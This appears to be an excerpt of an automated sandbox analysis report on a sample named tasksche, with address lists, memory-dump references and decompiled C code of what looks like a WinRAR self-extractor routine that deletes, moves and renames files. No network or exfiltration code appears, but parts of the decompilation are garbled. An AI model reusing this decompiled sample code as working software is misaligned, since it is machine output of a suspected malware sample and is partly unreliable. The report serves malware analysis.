                                                                                              0x0040f865
                                                                                              0x0040f868
                                                                                              0x0040f86d
                                                                                              0x0040f870
                                                                                              0x0040f872
                                                                                              0x0040f874
                                                                                              0x0040f87a
                                                                                              0x0040f87d
                                                                                              0x0040f87f
                                                                                              0x0040f87f
                                                                                              0x0040f87d
                                                                                              0x0040f883
                                                                                              0x0040f883
                                                                                              0x0040f883
                                                                                              0x0040f887
                                                                                              0x0040f88d
                                                                                              0x00000000
                                                                                              0x0040f88d
                                                                                              0x0040f7ec
                                                                                              0x0040f7ec
                                                                                              0x0040f7f2
                                                                                              0x0040f7f5
                                                                                              0x0040f7fc
                                                                                              0x0040f7fc
                                                                                              0x00000000
                                                                                              0x0040f7fc
                                                                                              0x0040f7f7
                                                                                              0x0040f7fa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f7fa
                                                                                              0x0040f7ea
                                                                                              0x0040f70c
                                                                                              0x0040f713
                                                                                              0x00000000
                                                                                              0x0040f713
                                                                                              0x0040f6ec
                                                                                              0x0040f6f2
                                                                                              0x0040f6f4
                                                                                              0x0040f6f4
                                                                                              0x0040f6fb
                                                                                              0x00000000
                                                                                              0x0040f650
                                                                                              0x0040f650
                                                                                              0x0040f656
                                                                                              0x0040f65b
                                                                                              0x0040f660
                                                                                              0x0040f675
                                                                                              0x0040f6c1
                                                                                              0x0040f6c1
                                                                                              0x0040f6c7
                                                                                              0x0040f6c9
                                                                                              0x0040f6c9
                                                                                              0x0040f67d
                                                                                              0x0040f683
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f690
                                                                                              0x0040f696
                                                                                              0x0040f698
                                                                                              0x00000000
                                                                                              0x0040f69e
                                                                                              0x0040f6a3
                                                                                              0x0040f6a9
                                                                                              0x0040f6ab
                                                                                              0x0040f6b1
                                                                                              0x0040f6bb
                                                                                              0x0040f6bb
                                                                                              0x00000000
                                                                                              0x0040f6ab
                                                                                              0x0040f698
                                                                                              0x0040faac
                                                                                              0x0040faae
                                                                                              0x00000000
                                                                                              0x0040faae
                                                                                              0x0040f64e
                                                                                              0x0040f5e3
                                                                                              0x0040f5e3
                                                                                              0x0040f5e4
                                                                                              0x0040f624
                                                                                              0x0040f62b
                                                                                              0x0040f631
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f637
                                                                                              0x0040f63d
                                                                                              0x00000000
                                                                                              0x0040f643
                                                                                              0x00000000
                                                                                              0x0040f643
                                                                                              0x0040f63d
                                                                                              0x0040f5e6
                                                                                              0x0040f5e9
                                                                                              0x0040f602
                                                                                              0x0040f607
                                                                                              0x0040f609
                                                                                              0x0040f619
                                                                                              0x0040f619
                                                                                              0x00000000
                                                                                              0x0040f609
                                                                                              0x00000000
                                                                                              0x0040f5c2
                                                                                              0x0040f5c4
                                                                                              0x0040fee0
                                                                                              0x0040fee5
                                                                                              0x0040feed
                                                                                              0x0040feed

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$z8D
                                                                                              • API String ID: 3519838083-129321368
                                                                                              • Opcode ID: 5390635a82d40dd247dc332e133fe5e3a78f65614b9a33f3b952f72cb076c8e5
                                                                                              • Instruction ID: cc4c1e380d3e9e53cf766c3de9df5bd6880f95cbde9f973ccf433d51db550174
                                                                                              • Opcode Fuzzy Hash: 5390635a82d40dd247dc332e133fe5e3a78f65614b9a33f3b952f72cb076c8e5
                                                                                              • Instruction Fuzzy Hash: C732C371540248BFEB31BF619C85E9B3A68EB06304F44407BF901B61E2DB794999CB6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 247 40e857-40e86f call 41a4dc call 41aaf0 252 40f434-40f43f 247->252 253 40e875-40e89b call 40d781 247->253 253->252 256 40e8a1-40e8a4 253->256 257 40e8a9-40e8c3 256->257 258 40e8ca-40e8dd call 40dcb8 257->258 261 40e8df 258->261 262 40e8e3-40e8fb call 411e60 261->262 265 40e90b-40e90f 262->265 266 40e8fd-40e904 262->266 267 40f405-40f42b call 40d781 265->267 268 40e915-40e918 265->268 266->262 269 40e906 266->269 267->257 284 40f431-40f433 267->284 270 40eb06-40eb0a 268->270 271 40ebc7-40ebcb 268->271 272 40eba8-40ebac 268->272 273 40e91f-40e923 268->273 269->267 270->267 277 40eb10-40eb1f 270->277 271->267 275 40ebd1-40ebd9 271->275 272->267 279 40ebb2-40ebc2 SetWindowTextW 272->279 273->267 276 40e929-40e993 call 419c9b call 40a146 call 409433 call 40945c call 4067e1 call 40960e 273->276 275->267 280 40ebdf-40ebf9 275->280 348 40eaf2-40eb01 call 409449 276->348 349 40e999 276->349 282 40eb21-40eb2d call 41a7c9 277->282 283 40eb2e-40eb32 277->283 279->267 285 40ec04-40ec0d call 41a7af 280->285 286 40ebfb-40ec01 280->286 282->283 289 40eb34-40eb3a 283->289 290 40eb3c-40eb44 call 40d92d 283->290 284->252 285->267 301 40ec13-40ec1a 285->301 286->285 294 40eb46-40eb4a 289->294 290->294 299 40eb50-40eb5c call 41a7af 294->299 300 40eb4c-40eb4e 294->300 303 40eb5e-40eb82 call 41a7af call 41a594 299->303 300->303 307 40ec36-40ec3a 301->307 308 40ec1c-40ec21 301->308 329 40eb84-40eb86 303->329 330 40eb89-40eb96 call 41a7c9 303->330 313 40ec40-40ec43 307->313 314 40ed1b 307->314 308->307 311 40ec23-40ec2a 308->311 311->267 317 40ec30-40ec31 311->317 319 40ec50-40ec6a RegOpenKeyExW 313->319 320 40ec45-40ec4a 313->320 315 40ed1c-40ed23 call 41a7f7 314->315 328 40ed28-40ed29 315->328 317->315 324 40ecb5-40ecbd 319->324 325 40ec6c-40eca6 RegQueryValueExW RegCloseKey 319->325 320->314 320->319 326 40ecea-40ed08 call 41a7af * 2 324->326 327 40ecbf-40ecd5 call 41a7af 324->327 332 40eca8 325->332 333 40ecab-40ecad 325->333 335 40ed2a-40ed3c call 41ca4f 326->335 364 40ed0a-40ed19 call 41a7c9 326->364 327->326 344 40ecd7-40ece9 call 41a7c9 327->344 328->335 329->330 330->267 346 40eb9c-40eba3 call 41a506 330->346 332->333 333->324 353 40ed4a-40ed98 call 41a7f7 call 40db16 GetDlgItem SetWindowTextW SendMessageW call 41aa21 335->353 354 40ed3e-40ed43 335->354 344->326 346->267 348->267 351 40e99e-40e9b4 SetFileAttributesW 349->351 358 40e9ba-40e9ee call 40aa7d call 40a116 call 41a7af 351->358 359 40ea5c-40ea68 GetFileAttributesW 351->359 384 40ed9d-40eda1 353->384 354->353 361 40ed45-40ed47 354->361 389 40e9f0-40ea00 call 41a7af 358->389 390 40ea02-40ea10 call 40a0a4 358->390 366 40ead6-40eaec call 40960e 359->366 367 40ea6a-40ea79 DeleteFileW 359->367 361->353 364->328 366->348 366->351 367->366 371 40ea7b-40ea7f 367->371 376 40ea87-40eaab call 40bc16 GetFileAttributesW 371->376 387 40ea81-40ea84 376->387 388 40eaad-40eac3 MoveFileW 376->388 384->267 385 40eda7-40edbc SendMessageW 384->385 385->267 387->376 388->366 391 40eac5-40ead0 MoveFileExW 388->391 389->390 396 40ea16-40ea56 call 41a7af call 41a820 SHFileOperationW 389->396 390->348 390->396 391->366 396->359
                                                                                              C-Code - Quality: 78%
                                                                                              			E0040E857(void* __esi) {
                                                                                              				intOrPtr _t271;
                                                                                              				void* _t274;
                                                                                              				void* _t349;
                                                                                              				short* _t352;
                                                                                              				void* _t354;
                                                                                              
                                                                                              				E0041A4DC(E004297C6, _t354);
                                                                                              				_t271 = E0041AAF0(0x1bc84);
                                                                                              				if( *((intOrPtr*)(_t354 + 0xc)) == 0) {
                                                                                              					L165:
                                                                                              					 *[fs:0x0] =  *((intOrPtr*)(_t354 - 0xc));
                                                                                              					return _t271;
                                                                                              				}
                                                                                              				_t271 = E0040D781(_t354 - 0x11, _t354 - 0xec90, __esi,  *((intOrPtr*)(_t354 + 0xc)), _t354 - 0x4440, _t354 + 0xf, 0x1000);
                                                                                              				 *((intOrPtr*)(_t354 + 0xc)) = _t271;
                                                                                              				if(_t271 != 0) {
                                                                                              					_push(__esi);
                                                                                              					do {
                                                                                              						_t349 = GetFileAttributesW;
                                                                                              						_t336 = _t354 - 0x1bc90;
                                                                                              						_t352 = 0x438818;
                                                                                              						_t274 = _t354 - 0x4440;
                                                                                              						 *(_t354 - 0x10) = _t354 - 0x1bc90;
                                                                                              						 *((intOrPtr*)(_t354 - 0x18)) = 6;
                                                                                              						goto L4;
                                                                                              						L6:
                                                                                              						while(E00411E60(_t354 - 0xec90,  *((intOrPtr*)(0x430100 +  *(_t354 - 0x10) * 4))) != 0) {
                                                                                              							 *(_t354 - 0x10) =  *(_t354 - 0x10) + 1;
                                                                                              							if( *(_t354 - 0x10) < 0xe) {
                                                                                              								continue;
                                                                                              							} else {
                                                                                              								goto L163;
                                                                                              							}
                                                                                              						}
                                                                                              						if( *(_t354 - 0x10) > 0xd) {
                                                                                              							goto L163;
                                                                                              						}
                                                                                              						switch( *((intOrPtr*)( *(_t354 - 0x10) * 4 +  &M0040F443))) {
                                                                                              							case 0:
                                                                                              								__eflags =  *((intOrPtr*)(_t354 + 0x10)) - 2;
                                                                                              								if( *((intOrPtr*)(_t354 + 0x10)) != 2) {
                                                                                              									goto L163;
                                                                                              								}
                                                                                              								E00419C9B(_t354 - 0x8c90, 0x800);
                                                                                              								E0040A146(_t354 - 0x8c90, _t354 - 0x4440, _t354 - 0xfc90, 0x800);
                                                                                              								E00409433(_t354 - 0x7c90);
                                                                                              								 *(_t354 - 4) =  *(_t354 - 4) & 0x00000000;
                                                                                              								E0040945C(_t354 - 0x7c90, _t354 - 0xfc90);
                                                                                              								E004067E1(_t354 - 0x5c88);
                                                                                              								_push(0);
                                                                                              								_t292 = E0040960E(_t354 - 0x7c90, _t347, _t354 - 0x5c88);
                                                                                              								__eflags = _t292;
                                                                                              								if(_t292 == 0) {
                                                                                              									L27:
                                                                                              									 *(_t354 - 4) =  *(_t354 - 4) | 0xffffffff;
                                                                                              									E00409449(_t354 - 0x7c90);
                                                                                              									goto L163;
                                                                                              								} else {
                                                                                              									_t352 = L"%s.%d.tmp";
                                                                                              									do {
                                                                                              										SetFileAttributesW(_t354 - 0x5c88, 0);
                                                                                              										__eflags =  *((char*)(_t354 - 0x4c7c));
                                                                                              										if(__eflags == 0) {
                                                                                              											L19:
                                                                                              											_t297 = GetFileAttributesW(_t354 - 0x5c88);
                                                                                              											__eflags = _t297 - 0xffffffff;
                                                                                              											if(_t297 == 0xffffffff) {
                                                                                              												goto L26;
                                                                                              											}
                                                                                              											_t301 = DeleteFileW(_t354 - 0x5c88);
                                                                                              											__eflags = _t301;
                                                                                              											if(_t301 != 0) {
                                                                                              												goto L26;
                                                                                              											} else {
                                                                                              												 *(_t354 - 0x10) =  *(_t354 - 0x10) & _t301;
                                                                                              												_push(_t301);
                                                                                              												goto L23;
                                                                                              												L23:
                                                                                              												E0040BC16(_t354 - 0x1040, 0x800, _t352, _t354 - 0x5c88);
                                                                                              												_t356 = _t356 + 0x14;
                                                                                              												_t306 = GetFileAttributesW(_t354 - 0x1040);
                                                                                              												__eflags = _t306 - 0xffffffff;
                                                                                              												if(_t306 != 0xffffffff) {
                                                                                              													_t67 = _t354 - 0x10;
                                                                                              													 *_t67 =  *(_t354 - 0x10) + 1;
                                                                                              													__eflags =  *_t67;
                                                                                              													_push( *(_t354 - 0x10));
                                                                                              													goto L23;
                                                                                              												} else {
                                                                                              													_t309 = MoveFileW(_t354 - 0x5c88, _t354 - 0x1040);
                                                                                              													__eflags = _t309;
                                                                                              													if(_t309 != 0) {
                                                                                              														MoveFileExW(_t354 - 0x1040, 0, 4);
                                                                                              													}
                                                                                              													goto L26;
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              										E0040AA7D(__eflags, _t354 - 0x8c90, _t354 - 0x1040, 0x800);
                                                                                              										E0040A116(__eflags, _t354 - 0x1040, 0x800);
                                                                                              										_t318 = E0041A7AF(_t354 - 0x8c90);
                                                                                              										 *((intOrPtr*)(_t354 - 0x18)) = _t318;
                                                                                              										__eflags = _t318 - 4;
                                                                                              										if(_t318 < 4) {
                                                                                              											L17:
                                                                                              											_t320 = E0040A0A4(_t354 - 0x4440);
                                                                                              											__eflags = _t320;
                                                                                              											if(_t320 != 0) {
                                                                                              												goto L27;
                                                                                              											}
                                                                                              											L18:
                                                                                              											_t322 = E0041A7AF(_t354 - 0x5c88);
                                                                                              											__eflags = 0;
                                                                                              											 *((short*)(_t354 + _t322 * 2 - 0x5c86)) = 0;
                                                                                              											E0041A820(_t349, _t354 - 0x40, 0, 0x1e);
                                                                                              											_t356 = _t356 + 0x10;
                                                                                              											_push(0x14);
                                                                                              											_pop(_t325);
                                                                                              											 *((short*)(_t354 - 0x30)) = _t325;
                                                                                              											 *((intOrPtr*)(_t354 - 0x38)) = _t354 - 0x5c88;
                                                                                              											 *((intOrPtr*)(_t354 - 0x3c)) = 3;
                                                                                              											SHFileOperationW(_t354 - 0x40);
                                                                                              											goto L19;
                                                                                              										}
                                                                                              										_t330 = E0041A7AF(_t354 - 0x1040);
                                                                                              										__eflags =  *((intOrPtr*)(_t354 - 0x18)) - _t330;
                                                                                              										if( *((intOrPtr*)(_t354 - 0x18)) > _t330) {
                                                                                              											goto L18;
                                                                                              										}
                                                                                              										goto L17;
                                                                                              										L26:
                                                                                              										_push(0);
                                                                                              										_t299 = E0040960E(_t354 - 0x7c90, _t347, _t354 - 0x5c88);
                                                                                              										__eflags = _t299;
                                                                                              									} while (_t299 != 0);
                                                                                              									goto L27;
                                                                                              								}
                                                                                              							case 1:
                                                                                              								__eflags =  *(__ebp + 0x10);
                                                                                              								if( *(__ebp + 0x10) == 0) {
                                                                                              									__eax =  *0x441850;
                                                                                              									__eflags = __eax;
                                                                                              									 *((char*)(__ebp - 0x12)) = __eax == 0;
                                                                                              									__eflags =  *((char*)(__ebp - 0x12));
                                                                                              									if( *((char*)(__ebp - 0x12)) == 0) {
                                                                                              										__eax = E0041A7C9(__eax, L"<br>");
                                                                                              										_pop(__ecx);
                                                                                              										_pop(__ecx);
                                                                                              									}
                                                                                              									__eflags =  *((char*)(__ebp - 0x11));
                                                                                              									if(__eflags == 0) {
                                                                                              										__edi = __ebp + 0xc;
                                                                                              										__edi = E0040D92D(__ebp + 0xc, __eflags);
                                                                                              									} else {
                                                                                              										__edi = __ebp - 0x4440;
                                                                                              									}
                                                                                              									__eflags =  *((char*)(__ebp - 0x12));
                                                                                              									if( *((char*)(__ebp - 0x12)) == 0) {
                                                                                              										__esi = E0041A7AF( *0x441850);
                                                                                              									} else {
                                                                                              										__esi = 0;
                                                                                              									}
                                                                                              									__eax = E0041A7AF(__edi);
                                                                                              									__eax = __eax + __esi;
                                                                                              									_push(__eax);
                                                                                              									_push( *0x441850);
                                                                                              									__eax = E0041A594(__ebx, __edi, __esi, __eflags);
                                                                                              									__esp = __esp + 0xc;
                                                                                              									__eflags =  *((char*)(__ebp - 0x12));
                                                                                              									 *0x441850 = __eax;
                                                                                              									if( *((char*)(__ebp - 0x12)) != 0) {
                                                                                              										__ecx = 0;
                                                                                              										__eflags = 0;
                                                                                              										 *__eax = __cx;
                                                                                              									}
                                                                                              									__eax = E0041A7C9(__eax, __edi);
                                                                                              									__eflags =  *((char*)(__ebp - 0x11));
                                                                                              									_pop(__ecx);
                                                                                              									_pop(__ecx);
                                                                                              									if(__eflags == 0) {
                                                                                              										_push(__edi);
                                                                                              										__eax = E0041A506(__ebx, __edi, __esi, __eflags);
                                                                                              										_pop(__ecx);
                                                                                              									}
                                                                                              								}
                                                                                              								goto L163;
                                                                                              							case 2:
                                                                                              								__eflags =  *(__ebp + 0x10);
                                                                                              								if( *(__ebp + 0x10) == 0) {
                                                                                              									__ebp - 0x4440 = SetWindowTextW( *(__ebp + 8), __ebp - 0x4440);
                                                                                              								}
                                                                                              								goto L163;
                                                                                              							case 3:
                                                                                              								__eflags =  *(__ebp + 0x10);
                                                                                              								if( *(__ebp + 0x10) != 0) {
                                                                                              									goto L163;
                                                                                              								}
                                                                                              								__eflags =  *0x44187a;
                                                                                              								if( *0x44187a != 0) {
                                                                                              									goto L163;
                                                                                              								}
                                                                                              								__eax = 0;
                                                                                              								__eflags =  *(__ebp - 0x4440) - 0x22;
                                                                                              								__edi = __ebp - 0x4440;
                                                                                              								 *(__ebp - 0x18) = __edi;
                                                                                              								 *(__ebp - 0x1040) = __ax;
                                                                                              								if( *(__ebp - 0x4440) == 0x22) {
                                                                                              									__edi = __ebp - 0x443e;
                                                                                              									 *(__ebp - 0x18) = __edi;
                                                                                              								}
                                                                                              								__eax = E0041A7AF(__edi);
                                                                                              								__eflags = __eax - __ebx;
                                                                                              								if(__eax >= __ebx) {
                                                                                              									goto L163;
                                                                                              								} else {
                                                                                              									__eax = __edi->i & 0x0000ffff;
                                                                                              									__eflags = __ax - 0x2e;
                                                                                              									if(__ax != 0x2e) {
                                                                                              										L52:
                                                                                              										__eflags = __ax - 0x5c;
                                                                                              										if(__ax == 0x5c) {
                                                                                              											L64:
                                                                                              											_push(__edi);
                                                                                              											L65:
                                                                                              											__eax = __ebp - 0x1040;
                                                                                              											_push(__ebp - 0x1040);
                                                                                              											__eax = E0041A7F7();
                                                                                              											L66:
                                                                                              											_pop(__ecx);
                                                                                              											_pop(__ecx);
                                                                                              											L67:
                                                                                              											__eax = __ebp - 0x1040;
                                                                                              											__eax = E0041CA4F(__ebp - 0x1040, 0x22);
                                                                                              											_pop(__ecx);
                                                                                              											_pop(__ecx);
                                                                                              											__eflags = __eax;
                                                                                              											if(__eax != 0) {
                                                                                              												__eflags =  *((short*)(2 + __eax));
                                                                                              												if( *((short*)(2 + __eax)) == 0) {
                                                                                              													__ecx = 0;
                                                                                              													__eflags = 0;
                                                                                              													 *__eax = __cx;
                                                                                              												}
                                                                                              											}
                                                                                              											__ebp - 0x1040 = E0041A7F7(__esi, __ebp - 0x1040);
                                                                                              											_pop(__ecx);
                                                                                              											_pop(__ecx);
                                                                                              											__ebp - 0x1040 = E0040DB16(__esi, __ebp - 0x1040, __ebx); // executed
                                                                                              											__edi = GetDlgItem( *(__ebp + 8), 0x66);
                                                                                              											__ebp - 0x1040 = SetWindowTextW(__edi, __ebp - 0x1040); // executed
                                                                                              											__eax = SendMessageW(__edi, 0x143, 0, __esi); // executed
                                                                                              											__eax = __ebp - 0x1040;
                                                                                              											__eax = E0041AA21(__esi, __ebp - 0x1040);
                                                                                              											_pop(__ecx);
                                                                                              											_pop(__ecx);
                                                                                              											__eflags = __eax;
                                                                                              											if(__eax != 0) {
                                                                                              												__ebp - 0x1040 = SendMessageW(__edi, 0x143, 0, __ebp - 0x1040);
                                                                                              											}
                                                                                              											goto L163;
                                                                                              										}
                                                                                              										__eflags = __ax;
                                                                                              										if(__ax == 0) {
                                                                                              											L55:
                                                                                              											__eax = __ebp - 0x1c;
                                                                                              											__eax = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x1c);
                                                                                              											__eflags = __eax;
                                                                                              											if(__eax == 0) {
                                                                                              												__ebp - 0x10 = __ebp - 0x1040;
                                                                                              												__eax = __ebp - 0x20;
                                                                                              												 *(__ebp - 0x10) = 0x1000;
                                                                                              												RegQueryValueExW( *(__ebp - 0x1c), L"ProgramFilesDir", 0, __ebp - 0x20, __ebp - 0x1040, __ebp - 0x10) = RegCloseKey( *(__ebp - 0x1c));
                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                              												__eax = 0x7ff;
                                                                                              												__eflags =  *(__ebp - 0x10) - 0x7ff;
                                                                                              												if( *(__ebp - 0x10) < 0x7ff) {
                                                                                              													__eax =  *(__ebp - 0x10);
                                                                                              												}
                                                                                              												__ecx = 0;
                                                                                              												__eflags = 0;
                                                                                              												 *(__ebp + __eax * 2 - 0x1040) = __cx;
                                                                                              											}
                                                                                              											__eflags =  *(__ebp - 0x1040);
                                                                                              											if( *(__ebp - 0x1040) != 0) {
                                                                                              												__eax = __ebp - 0x1040;
                                                                                              												__eax = E0041A7AF(__ebp - 0x1040);
                                                                                              												__eflags =  *((short*)(__ebp + __eax * 2 - 0x1042)) - 0x5c;
                                                                                              												if( *((short*)(__ebp + __eax * 2 - 0x1042)) != 0x5c) {
                                                                                              													__ebp - 0x1040 = E0041A7C9(__ebp - 0x1040, "\\");
                                                                                              													_pop(__ecx);
                                                                                              													_pop(__ecx);
                                                                                              												}
                                                                                              											}
                                                                                              											__edi = E0041A7AF(__edi);
                                                                                              											__eax = __ebp - 0x1040;
                                                                                              											__edi = __edi + E0041A7AF(__ebp - 0x1040);
                                                                                              											__eflags = __edi - 0x7ff;
                                                                                              											if(__edi >= 0x7ff) {
                                                                                              												goto L67;
                                                                                              											} else {
                                                                                              												__ebp - 0x1040 = E0041A7C9(__ebp - 0x1040,  *(__ebp - 0x18));
                                                                                              												goto L66;
                                                                                              											}
                                                                                              										}
                                                                                              										__eflags = __edi->i - 0x3a;
                                                                                              										if(__edi->i == 0x3a) {
                                                                                              											goto L64;
                                                                                              										}
                                                                                              										goto L55;
                                                                                              									}
                                                                                              									__eflags = __edi->i - 0x5c;
                                                                                              									if(__edi->i != 0x5c) {
                                                                                              										goto L52;
                                                                                              									}
                                                                                              									_t103 = __edi + 4; // 0x26
                                                                                              									__eax = _t103;
                                                                                              									__eflags =  *__eax;
                                                                                              									if( *__eax == 0) {
                                                                                              										goto L163;
                                                                                              									}
                                                                                              									_push(__eax);
                                                                                              									goto L65;
                                                                                              								}
                                                                                              							case 4:
                                                                                              								__eflags =  *0x441874 - 1;
                                                                                              								__eflags = __eax - 0x441874;
                                                                                              								__edi->i = __edi->i + __ecx;
                                                                                              								__eflags = __edi->i & __dh;
                                                                                              								_push(es);
                                                                                              								 *__eax =  *__eax + __al;
                                                                                              								__eflags =  *__eax;
                                                                                              							case 5:
                                                                                              								__eax =  *(__ebp - 0x4440) & 0x0000ffff;
                                                                                              								__eax =  *(__ebp - 0x4440) & 0x0000ffff;
                                                                                              								__eflags = __eax;
                                                                                              								if(__eax == 0) {
                                                                                              									L84:
                                                                                              									 *0x441831 = 0;
                                                                                              									 *0x441830 = 1;
                                                                                              									goto L163;
                                                                                              								}
                                                                                              								__eax = __eax - 0x30;
                                                                                              								__eflags = __eax;
                                                                                              								if(__eax == 0) {
                                                                                              									 *0x441831 = 0;
                                                                                              									L83:
                                                                                              									 *0x441830 = 0;
                                                                                              									goto L163;
                                                                                              								}
                                                                                              								__eax = __eax - 1;
                                                                                              								__eflags = __eax;
                                                                                              								if(__eax == 0) {
                                                                                              									goto L84;
                                                                                              								}
                                                                                              								__eax = __eax - 1;
                                                                                              								__eflags = __eax;
                                                                                              								if(__eax != 0) {
                                                                                              									goto L163;
                                                                                              								}
                                                                                              								 *0x441831 = 1;
                                                                                              								goto L83;
                                                                                              							case 6:
                                                                                              								__eflags =  *(__ebp + 0x10) - 4;
                                                                                              								if( *(__ebp + 0x10) != 4) {
                                                                                              									goto L94;
                                                                                              								}
                                                                                              								__eax = __ebp - 0x4440;
                                                                                              								__eax = E0041AA21(__ebp - 0x4440, L"<>");
                                                                                              								_pop(__ecx);
                                                                                              								_pop(__ecx);
                                                                                              								__eflags = __eax;
                                                                                              								if(__eax == 0) {
                                                                                              									goto L94;
                                                                                              								}
                                                                                              								_push(0);
                                                                                              								goto L93;
                                                                                              							case 7:
                                                                                              								__eflags =  *(__ebp + 0x10) - 1;
                                                                                              								if(__eflags != 0) {
                                                                                              									L114:
                                                                                              									__eflags =  *(__ebp + 0x10) - 7;
                                                                                              									if( *(__ebp + 0x10) == 7) {
                                                                                              										__eflags =  *0x441874;
                                                                                              										if( *0x441874 == 0) {
                                                                                              											 *0x441874 = 2;
                                                                                              										}
                                                                                              										 *0x441870 = 1;
                                                                                              									}
                                                                                              									goto L163;
                                                                                              								}
                                                                                              								__ebp - 0x8c90 = GetTempPathW(__ebx, __ebp - 0x8c90);
                                                                                              								__ebp - 0x8c90 = E0040A116(__eflags, __ebp - 0x8c90, __ebx);
                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000000;
                                                                                              								_push(0);
                                                                                              								__esi = L"%s%s%d";
                                                                                              								while(1) {
                                                                                              									_push( *0x4300c8);
                                                                                              									__ebp - 0x8c90 = __ebp - 0x1040;
                                                                                              									E0040BC16(__ebp - 0x1040, __ebx, __esi, __ebp - 0x8c90) = __ebp - 0x1040;
                                                                                              									_push(__ebp - 0x1040);
                                                                                              									__eax = __edi->i();
                                                                                              									__eflags = __eax - 0xffffffff;
                                                                                              									if(__eax == 0xffffffff) {
                                                                                              										break;
                                                                                              									}
                                                                                              									_t152 = __ebp - 0x10;
                                                                                              									 *_t152 =  *(__ebp - 0x10) + 1;
                                                                                              									__eflags =  *_t152;
                                                                                              									_push( *(__ebp - 0x10));
                                                                                              								}
                                                                                              								__ebp - 0x1040 = SetDlgItemTextW( *(__ebp + 8), 0x66, __ebp - 0x1040);
                                                                                              								__eflags =  *(__ebp - 0x4440);
                                                                                              								if( *(__ebp - 0x4440) == 0) {
                                                                                              									goto L163;
                                                                                              								}
                                                                                              								__eflags =  *0x44184a;
                                                                                              								if( *0x44184a != 0) {
                                                                                              									goto L163;
                                                                                              								}
                                                                                              								__eax = 0;
                                                                                              								 *(__ebp - 0x1440) = __ax;
                                                                                              								__eax = __ebp - 0x4440;
                                                                                              								__eax = E0041CA29(__ebp - 0x4440, 0x2c);
                                                                                              								_pop(__ecx);
                                                                                              								_pop(__ecx);
                                                                                              								__eflags = __eax;
                                                                                              								if(__eax != 0) {
                                                                                              									L110:
                                                                                              									__eflags =  *(__ebp - 0x1440);
                                                                                              									if( *(__ebp - 0x1440) == 0) {
                                                                                              										__ebp - 0x1bc90 = __ebp - 0x4440;
                                                                                              										E0041A7F7(__ebp - 0x4440, __ebp - 0x1bc90) = __ebp - 0x19c90;
                                                                                              										__ebp - 0x1440 = E0041A7F7(__ebp - 0x1440, __ebp - 0x19c90);
                                                                                              									}
                                                                                              									__ebp - 0x4440 = E0040D24C(__ebp - 0x4440);
                                                                                              									__eax = 0;
                                                                                              									 *(__ebp - 0x3440) = __ax;
                                                                                              									__ebp - 0x1440 = __ebp - 0x4440;
                                                                                              									__eax = MessageBoxW( *(__ebp + 8), __ebp - 0x4440, __ebp - 0x1440, 0x24);
                                                                                              									__eflags = __eax - 6;
                                                                                              									if(__eax == 6) {
                                                                                              										goto L163;
                                                                                              									} else {
                                                                                              										 *0x441849 = 1;
                                                                                              										 *0x44183c = 1;
                                                                                              										__eax = EndDialog( *(__ebp + 8), 1);
                                                                                              										goto L114;
                                                                                              									}
                                                                                              								}
                                                                                              								__ecx = 0;
                                                                                              								__eflags =  *(__ebp - 0x4440) - __cx;
                                                                                              								if( *(__ebp - 0x4440) == __cx) {
                                                                                              									goto L110;
                                                                                              								}
                                                                                              								__eax = __ebp - 0x4440;
                                                                                              								while(1) {
                                                                                              									__eflags =  *__eax - 0x40;
                                                                                              									if( *__eax == 0x40) {
                                                                                              										break;
                                                                                              									}
                                                                                              									__ecx = __ecx + 1;
                                                                                              									__eax = __ebp + __ecx * 2 - 0x4440;
                                                                                              									__eflags =  *__eax;
                                                                                              									if( *__eax != 0) {
                                                                                              										continue;
                                                                                              									}
                                                                                              									goto L110;
                                                                                              								}
                                                                                              								__esi = __ecx + __ecx;
                                                                                              								__ebp + __esi - 0x443e = __ebp - 0x1440;
                                                                                              								__eax = E0041A7F7(__ebp - 0x1440, __ebp + __esi - 0x443e);
                                                                                              								_pop(__ecx);
                                                                                              								__eax = 0;
                                                                                              								__eflags = 0;
                                                                                              								_pop(__ecx);
                                                                                              								 *(__ebp + __esi - 0x4440) = __ax;
                                                                                              								goto L110;
                                                                                              							case 8:
                                                                                              								__eflags =  *(__ebp + 0x10) - 3;
                                                                                              								if( *(__ebp + 0x10) == 3) {
                                                                                              									__eflags =  *(__ebp - 0x4440);
                                                                                              									if(__eflags != 0) {
                                                                                              										__ebp - 0x4440 = SetWindowTextW( *(__ebp + 8), __ebp - 0x4440);
                                                                                              									}
                                                                                              									__edi = __ebp + 0xc;
                                                                                              									 *0x441854 = E0040D92D(__edi, __eflags);
                                                                                              								}
                                                                                              								 *0x44184b = 1;
                                                                                              								goto L163;
                                                                                              							case 9:
                                                                                              								__eflags =  *(__ebp + 0x10) - 5;
                                                                                              								if( *(__ebp + 0x10) != 5) {
                                                                                              									L94:
